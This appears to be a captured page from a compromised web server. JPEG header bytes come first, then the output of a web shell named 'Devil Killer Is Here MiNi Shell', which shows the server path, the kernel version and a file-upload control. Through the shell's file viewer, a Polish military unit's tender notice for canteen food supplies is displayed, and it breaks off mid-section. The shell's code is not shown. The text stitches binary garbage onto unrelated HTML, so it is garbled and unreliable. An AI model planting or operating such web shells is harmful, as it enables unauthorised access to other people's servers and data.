JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251024/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251024/0049516301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa czekolady, wyrobów cukierniczych i deserów; przetworów <br/>strączkowych zbożowych i ziemniaczanych oraz olei i tłuszczy roślinnych <br/>dla Stołówek Wojskowych nr 1 i 2 Jednostki Wojskowej nr 3964” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">JEDNOSTKA WOJSKOWA NR 3964</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 017172392</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">gen. Leonarda Skierskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-650</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ozjw3964@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ozjw3964.wp.mil.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Zamawiający publiczny - jednostka wojskowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa czekolady, wyrobów cukierniczych i deserów; przetworów <br/>strączkowych zbożowych i ziemniaczanych oraz olei i tłuszczy roślinnych <br/>dla Stołówek Wojskowych nr 1 i 2 Jednostki Wojskowej nr 3964” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-915e412e-8bcc-4059-b764-7070a1b087a8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00495163</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00011005/17/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.18 Dostawa czekolady, wyrobów cukierniczych i deserów; przetworów strączkowych, zbożowych i ziemniaczanych oraz olei i tłuszczy roślinnych dla Stołówek Wojskowych Nr 1 i 2 Jednostki Wojskowej Nr 3964</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1201530 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1201530</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://platformazakupowa.pl/transakcja/1201530</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z zał. 7-9 do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z zał. 7-9 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">6/2025/Z</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dla I części: Dostawa czekolady, wyrobów cukierniczych i deserów<br/>Szczegółowy Opis Przedmiotu Zamówienia znajduje się:<br/>załączniku nr 1.1 do SWZ – Formularz cenowo – asortymentowy dla części 1<br/>załączniku nr 2.1 do SWZ – Opis przedmiotu zamówienia dla części 1<br/>załączniku nr 4 do SWZ – Projektowane postanowienia umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15812000-3 - Wyroby ciastkarskie i ciasta</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15840000-8 - Kakao; czekolada i wyroby cukiernicze</p> <p class="mb-0">15833100-7 - Desery</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zgodnie z art. 441 ustawy Zamawiający przewiduje możliwość skorzystania z prawa opcji tj. zwiększenia zakresu podstawowego (ilości) przedmiotu wskazanego w załączniku 1.1 <br/>do SWZ „Formularz asortymentowo-cenowy” kol. „Ilość wymagana” maksymalnie o ilości wskazane w kol. „Zakres prawa opcji”. <br/>Skorzystanie przez Zamawiającego z prawa opcji będzie miało zastosowanie w ramach zawartej umowy według cen jednostkowych określonych w umowie w wypadkach konieczności zapewnienia ciągłości zaopatrywania osób żywionych. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-02 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wykonawca w Formularzu cenowym stanowiącym Załącznik nr 1.1, 1.2, 1.3 do SWZ (w zależności od<br/>części) wpisze odpowiednie wartości tj. ceny jednostkowe netto, stawkę VAT, ceny jednostkowe brutto, wartości netto i brutto<br/>(zamówienie podstawowe/prawo opcji) dla każdej pozycji asortymentu oraz sumy w wierszu oznaczonym „RAZEM”.<br/>Ogłoszenie nr 2025/BZP 00490911/01 z dnia 2025-10-22<br/>2025-10-22 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>2. Wykonawca umieści cenę oferty w Formularzu ofertowym sporządzonym zgodnie<br/>ze wzorem stanowiącym załącznik nr 1 do SWZ.<br/>3. Wykonawca poda ceny jednostkowe netto, stawkę VAT, ceny jednostkowe brutto w PLN dla każdej pozycji asortymentowej oraz<br/>cenę za całość zamówienia tj. cenę netto, stawkę VAT oraz cenę brutto.<br/>4. Cena umieszczona przez wykonawcę w Formularzu ofertowym uwzględnia wszystkie koszty związane z realizacją przedmiotu<br/>zamówienia zgodnie z dokumentami zamówienia.<br/>5. Cena oferty stanowi wynagrodzenie ryczałtowe i jest wyrażona w złotych polskich (PLN).<br/>6. Wprowadzenie przez wykonawcę zmian w ilościach określonych przez Zamawiającego<br/>w formularzu ofertowym (załącznik 1 do SWZ) spowoduje odrzucenie oferty.<br/>7. Pominięcie chociażby jednej pozycji (krotności) skutkuje odrzuceniem oferty.<br/>8. Wykonawca jest odpowiedzialny za ustalenie prawidłowej stawki podatku VAT na oferowane towary. W przypadku zastosowania innej stawki, niż obowiązująca, wykonawca zobowiązany jest dołączyć do oferty<br/>pisemne uzasadnienie zastosowania tej stawki. Zastosowanie przez wykonawcę stawki VAT niezgodnej z obowiązującymi<br/>przepisami, spowoduje odrzucenie oferty.<br/>9. Cena może być tylko jedna (nie dopuszcza się wariantowości cen).<br/>Kryterium oceny ofert:<br/>Po stwierdzeniu ważności złożonej oferty Zamawiający wybierze ofertę według kryteriów: cena oferty brutto(X) – znaczenie 100%,<br/>2. Sposób dokonania oceny – według poniższego wzoru<br/>X = (Cn : Cb) x 100<br/>gdzie: Cn – cena najkorzystniejszej oferty,<br/>Cb – cena oferty badanej<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dla II części: Dostawa przetworów strączkowych zbożowych i ziemniaczanych<br/>Szczegółowy Opis Przedmiotu Zamówienia znajduje się:<br/>	załączniku nr 1.2 do SWZ – Formularz cenowo – asortymentowy dla części II<br/>	załączniku nr 2.2 do SWZ – Opis przedmiotu zamówienia dla części II<br/>	załączniku nr 4 do SWZ – Projektowane postanowienia umowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03212200-2 - Warzywa strączkowe suszone, łuskane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15613100-9 - Produkty przemiału owsa</p> <p class="mb-0">15312000-8 - Produkty ziemniaczane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-02 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wykonawca w Formularzu cenowym stanowiącym Załącznik nr 1.1, 1.2, 1.3 do SWZ (w zależności od<br/>części) wpisze odpowiednie wartości tj. ceny jednostkowe netto, stawkę VAT, ceny jednostkowe brutto, wartości netto i brutto<br/>(zamówienie podstawowe/prawo opcji) dla każdej pozycji asortymentu oraz sumy w wierszu oznaczonym „RAZEM”.<br/>2. Wykonawca umieści cenę oferty w Formularzu ofertowym sporządzonym zgodnie<br/>ze wzorem stanowiącym załącznik nr 1 do SWZ.<br/>3. Wykonawca poda ceny jednostkowe netto, stawkę VAT, ceny jednostkowe brutto w PLN dla każdej pozycji asortymentowej oraz<br/>cenę za całość zamówienia tj. cenę netto, stawkę VAT oraz cenę brutto.<br/>4. Cena umieszczona przez wykonawcę w Formularzu ofertowym uwzględnia wszystkie koszty związane z realizacją przedmiotu<br/>zamówienia zgodnie z dokumentami zamówienia.<br/>5. Cena oferty stanowi wynagrodzenie ryczałtowe i jest wyrażona w złotych polskich (PLN).<br/>6. Wprowadzenie przez wykonawcę zmian w ilościach określonych przez Zamawiającego<br/>w formularzu ofertowym (załącznik 1 do SWZ) spowoduje odrzucenie oferty.<br/>7. Pominięcie chociażby jednej pozycji (krotności) skutkuje odrzuceniem oferty.<br/>8. Wykonawca jest odpowiedzialny za ustalenie prawidłowej stawki podatku VAT na oferowane towary. W przypadku zastosowania innej stawki, niż obowiązująca, wykonawca zobowiązany jest dołączyć do oferty<br/>pisemne uzasadnienie zastosowania tej stawki. Zastosowanie przez wykonawcę stawki VAT niezgodnej z obowiązującymi<br/>przepisami, spowoduje odrzucenie oferty.<br/>9. Cena może być tylko jedna (nie dopuszcza się wariantowości cen).<br/>Kryterium oceny ofert:<br/>Po stwierdzeniu ważności złożonej oferty Zamawiający wybierze ofertę według kryteriów: cena oferty brutto(X) – znaczenie 100%,<br/>2. Sposób dokonania oceny – według poniższego wzoru<br/>X = (Cn : Cb) x 100<br/>gdzie: Cn – cena najkorzystniejszej oferty,<br/>Cb – cena oferty badanej<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona<br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dla III części: Dostawa oleju i tłuszczy roślinnych<br/>Szczegółowy Opis Przedmiotu Zamówienia znajduje się:<br/>załączniku nr 1.3 do SWZ – Formularz cenowo – asortymentowy dla części III<br/>załączniku nr 2.3 do SWZ – Opis przedmiotu zamówienia dla części III<br/>załączniku nr 4 do SWZ – Projektowane postanowienia umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15410000-5 - Surowe oleje i tłuszcze zwierzęce lub roślinne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-02 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wykonawca w Formularzu cenowym stanowiącym Załącznik nr 1.1, 1.2, 1.3 do SWZ (w zależności od<br/>części) wpisze odpowiednie wartości tj. ceny jednostkowe netto, stawkę VAT, ceny jednostkowe brutto, wartości netto i brutto<br/>(zamówienie podstawowe/prawo opcji) dla każdej pozycji asortymentu oraz sumy w wierszu oznaczonym „RAZEM”.<br/>2. Wykonawca umieści cenę oferty w Formularzu ofertowym sporządzonym zgodnie<br/>ze wzorem stanowiącym załącznik nr 1 do SWZ.<br/>3. Wykonawca poda ceny jednostkowe netto, stawkę VAT, ceny jednostkowe brutto w PLN dla każdej pozycji asortymentowej oraz<br/>cenę za całość zamówienia tj. cenę netto, stawkę VAT oraz cenę brutto.<br/>4. Cena umieszczona przez wykonawcę w Formularzu ofertowym uwzględnia wszystkie koszty związane z realizacją przedmiotu<br/>zamówienia zgodnie z dokumentami zamówienia.<br/>5. Cena oferty stanowi wynagrodzenie ryczałtowe i jest wyrażona w złotych polskich (PLN).<br/>6. Wprowadzenie przez wykonawcę zmian w ilościach określonych przez Zamawiającego<br/>w formularzu ofertowym (załącznik 1 do SWZ) spowoduje odrzucenie oferty.<br/>7. Pominięcie chociażby jednej pozycji (krotności) skutkuje odrzuceniem oferty.<br/>8. Wykonawca jest odpowiedzialny za ustalenie prawidłowej stawki podatku VAT<br/>na oferowane towary. W przypadku zastosowania innej stawki, niż obowiązująca, wykonawca zobowiązany jest dołączyć do oferty<br/>pisemne uzasadnienie zastosowania tej stawki. Zastosowanie przez wykonawcę stawki VAT niezgodnej z obowiązującymi<br/>przepisami, spowoduje odrzucenie oferty.<br/>9. Cena może być tylko jedna (nie dopuszcza się wariantowości cen).<br/>Kryterium oceny ofert:<br/>Po stwierdzeniu ważności złożonej oferty Zamawiający wybierze ofertę według kryteriów: cena oferty brutto(X) – znaczenie 100%,<br/>2. Sposób dokonania oceny – według poniższego wzoru<br/>X = (Cn : Cb) x 100<br/>gdzie: Cn – cena najkorzystniejszej oferty,<br/>Cb – cena oferty badanej<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z art. 57 ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych, o udzielenie zamówienia mogą<br/>ubiegać się Wykonawcy, którzy:<br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>1) nie podlegają wykluczeniu;<br/>2) spełniają warunki udziału w postępowaniu.<br/>2. Podstawy wykluczenia - o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) wykażą brak podstaw wykluczenia z powodu niespełnienia warunków określonych w art. 108 ust. 1, art. 109. ust. 1 oraz<br/>art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. z 2024 r., poz. 507);<br/>2) Zamawiający uzna, że Wykonawca nie podlega wykluczeniu z postępowania, zgodnie z art. 108 ust. 1, art. 109 ust. 1<br/>oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. z 2024 r., poz. 507);<br/>3) W przypadkach, gdy Wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na zasobach innych<br/>podmiotów, w stosunku do żadnego z tych podmiotów nie mogą występować uwarunkowania art. 108 ust. 1, art. 109 ust. 1<br/>oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. z 2024 r., poz. 773).<br/>3. Informacja o warunkach udziału w postępowaniu - o 